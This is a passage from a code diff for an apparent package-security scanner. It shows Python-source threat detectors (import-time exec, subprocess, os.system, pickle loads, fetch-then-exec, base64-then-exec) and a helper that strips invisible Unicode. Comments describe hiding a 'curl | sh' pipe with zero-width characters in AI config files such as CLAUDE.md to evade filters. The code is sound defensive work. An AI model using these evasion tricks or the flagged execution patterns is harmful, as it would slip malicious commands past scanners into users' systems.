+    const hasOsSystem = detectImportTimeOsSystem(cleaned);
+    const hasFetch = detectNetworkFetch(cleaned);
+    const hasBase64 = detectBase64Decode(cleaned);
+    const hasDeser = detectDeserialization(cleaned);
+    const hasDynImport = detectDynamicDangerousImport(cleaned);
+
+    if (hasExec) {
+      threats.push({
+        type: 'import_time_exec',
+        severity: 'CRITICAL',
+        message: `${relPath}: exec()/eval() at module level — direct code execution on import or pip install (RCE).`,
+        file: relPath
+      });
+    }
+    if (hasSubprocess) {
+      threats.push({
+        type: 'import_time_subprocess',
+        severity: 'CRITICAL',
+        message: `${relPath}: subprocess.Popen/run/call/check_output — spawns external process on import or install.`,
+        file: relPath
+      });
+    }
+    if (hasOsSystem) {
+      threats.push({
+        type: 'import_time_os_system',
+        severity: 'CRITICAL',
+        message: `${relPath}: os.system()/os.popen()/os.spawn*()/os.exec*() — shell execution on import or install.`,
+        file: relPath
+      });
+    }
+    if (hasDeser) {
+      threats.push({
+        type: 'import_time_deserialization',
+        severity: 'CRITICAL',
+        message: `${relPath}: pickle/marshal/dill/cloudpickle/jsonpickle .loads() — unsafe deserialization, trivially RCE if input is attacker-controlled.`,
+        file: relPath
+      });
+    }
+    if (hasDynImport) {
+      threats.push({
+        type: 'dynamic_dangerous_import',
+        severity: 'HIGH',
+        message: `${relPath}: __import__() with hardcoded dangerous module name (subprocess/os/requests/urllib/socket/...) — obfuscation pattern to evade static analysis.`,
+        file: relPath
+      });
+    }
+
+    // 4. Compound detectors (in addition to individual fires).
+    if (hasFetch && hasExec) {
+      threats.push({
+        type: 'import_time_fetch_exec',
+        severity: 'CRITICAL',
+        message: `${relPath}: network fetch (urllib/requests/http.client/httpx/aiohttp) AND exec/eval in same file — TrapDoor-style remote-payload-then-RCE.`,
+        file: relPath
+      });
+    }
+    if (hasBase64 && hasExec) {
+      threats.push({
+        type: 'import_time_base64_exec',
+        severity: 'CRITICAL',
+        message: `${relPath}: base64/codecs decode AND exec/eval in same file — obfuscated payload execution pattern.`,
+        file: relPath
+      });
+    }
+  }
+
+  return threats;
+}
+
+module.exports = {
+  scanPythonSource,
+  // Exported for unit testing of the helpers in isolation.
+  _internal: {
+    findTargetPythonFiles,
+    stripPythonComments,
+    stripTripleQuotedStrings,
+    detectImportTimeExec,
+    detectImportTimeSubprocess,
+    detectImportTimeOsSystem,
+    detectNetworkFetch,
+    detectBase64Decode,
+    detectDeserialization,
+    detectDynamicDangerousImport
+  }
+};

package/src/shared/unicode-invisibles.js

@@ -0,0 +1,164 @@
+'use strict';
+
+/**
+ * Unicode invisible character helpers — shared by obfuscation.js and ai-config.js.
+ *
+ * Extracted v2.11.25 (TrapDoor campaign, mai 2026) : la fonction locale dans
+ * obfuscation.js couvrait `.js/.cjs/.mjs/.ts/.tsx/.py` mais pas les configs IA
+ * (.cursorrules, CLAUDE.md). En la partageant, ai-config.js peut normaliser le
+ * contenu avant ses regex et bloquer le vecteur "cu<U+200B>rl|sh" avec ZW
+ * interspersés dans le mot-clé.
+ *
+ * Codepoints détectés (superset du scope original obfuscation.js, qui n'incluait
+ * pas LRM/RLM ni les directional override) :
+ *
+ *   Zero-width:
+ *     U+200B ZWSP, U+200C ZWNJ, U+200D ZWJ
+ *     U+2060 word joiner
+ *     U+180E Mongolian vowel separator
+ *
+ *   Directional (bidi spoofing — Trojan Source CVE-2021-42574) :
+ *     U+200E LRM, U+200F RLM
+ *     U+202A LRE, U+202B RLE, U+202C PDF, U+202D LRO, U+202E RLO
+ *
+ *   Invisible math operators (peuvent casser un parser sans être vus) :
+ *     U+2061 function application, U+2062 invisible times,
+ *     U+2063 invisible separator, U+2064 invisible plus
+ *
+ *   BOM (mid-text only; position 0 est légitime UTF-8 BOM) :
+ *     U+FEFF
+ *
+ *   Variation selectors :
+ *     U+FE00-FE0E (excludes U+FE0F emoji presentation selector — légitime)
+ *     U+E0100-E01EF supplementary plane variation selectors
+ *
+ *   Tag characters (utilisés par GlassWorm pour encoder du payload) :
+ *     U+E0001, U+E0020-E007F
+ *
+ * CJK, accents, emoji standards (avec U+FE0F) sont volontairement EXCLUS — pas
+ * de FP attendu sur du contenu international légitime.
+ *
+ * Références :
+ *  - https://www.aikido.dev/blog/glassworm-returns-unicode-attack-github-npm-vscode
+ *  - https://trojansource.codes/ (Trojan Source, CVE-2021-42574)
+ *  - https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates (mai 2026)
+ */
+
+/**
+ * Returns true if the codepoint at position `i` is considered invisible.
+ * Sets `skipNext` true on the result if the codepoint is supplementary
+ * (caller must `i++` to skip the low surrogate half).
+ *
+ * @param {string} content
+ * @param {number} i
+ * @returns {{ invisible: boolean, supplementary: boolean }}
+ */
+function inspectCodepoint(content, i) {
+  const cp = content.codePointAt(i);
+
+  // BMP zero-width
+  if (cp === 0x200B || cp === 0x200C || cp === 0x200D) {
+    return { invisible: true, supplementary: false };
+  }
+
+  // BMP directional (Trojan Source)
+  if (cp === 0x200E || cp === 0x200F ||
+      (cp >= 0x202A && cp <= 0x202E)) {
+    return { invisible: true, supplementary: false };
+  }
+
+  // BMP word joiner & friends
+  if (cp === 0x2060 || cp === 0x180E) {
+    return { invisible: true, supplementary: false };
+  }
+
+  // BMP invisible math operators (U+2061-2064)
+  if (cp >= 0x2061 && cp <= 0x2064) {
+    return { invisible: true, supplementary: false };
+  }
+
+  // BOM only suspicious after position 0
+  if (cp === 0xFEFF && i > 0) {
+    return { invisible: true, supplementary: false };
+  }
+
+  // BMP variation selectors (U+FE00-U+FE0E) — excludes U+FE0F emoji presentation
+  if (cp >= 0xFE00 && cp <= 0xFE0E) {
+    return { invisible: true, supplementary: false };
+  }
+
+  // Supplementary plane: variation selectors supplement (U+E0100-U+E01EF)
+  if (cp >= 0xE0100 && cp <= 0xE01EF) {
+    return { invisible: true, supplementary: true };
+  }
+
+  // Supplementary plane: tag characters (U+E0001 + U+E0020-U+E007F)
+  if (cp === 0xE0001 || (cp >= 0xE0020 && cp <= 0xE007F)) {
+    return { invisible: true, supplementary: true };
+  }
+
+  // Other supplementary chars (non-invisible) — need to skip low surrogate
+  if (cp > 0xFFFF) {
+    return { invisible: false, supplementary: true };
+  }
+
+  return { invisible: false, supplementary: false };
+}
+
+/**
+ * Count invisible Unicode codepoints in `content`.
+ *
+ * @param {string} content
+ * @returns {number}
+ */
+function countInvisibleUnicode(content) {
+  let count = 0;
+  for (let i = 0; i < content.length; i++) {
+    const { invisible, supplementary } = inspectCodepoint(content, i);
+    if (invisible) count++;
+    if (supplementary) i++; // skip low surrogate half
+  }
+  return count;
+}
+
+/**
+ * Return a copy of `content` with all invisible codepoints removed.
+ *
+ * Used to normalize text before pattern matching: prevents an attacker
+ * from splitting a keyword (`cu<U+200B>rl`) with zero-width chars to evade
+ * regex like /curl\s+/i.
+ *
+ * @param {string} content
+ * @returns {string}
+ */
+function stripInvisibleUnicode(content) {
+  // Fast path: if no codepoint > 0x7F, content is pure ASCII — nothing to strip.
+  let hasHighChar = false;
+  for (let i = 0; i < content.length; i++) {
+    if (content.charCodeAt(i) > 0x7F) { hasHighChar = true; break; }
+  }
+  if (!hasHighChar) return content;
+
+  let out = '';
+  for (let i = 0; i < content.length; i++) {
+    const { invisible, supplementary } = inspectCodepoint(content, i);
+    if (!invisible) {
+      // Preserve original char(s). For supplementary, copy both surrogate halves.
+      if (supplementary) {
+        out += content[i] + content[i + 1];
+        i++;
+      } else {
+        out += content[i];
+      }
+    } else if (supplementary) {
+      // Skip both surrogate halves
+      i++;
+    }
+  }
+  return out;
+}
+
+module.exports = {
+  countInvisibleUnicode,
+  stripInvisibleUnicode
+};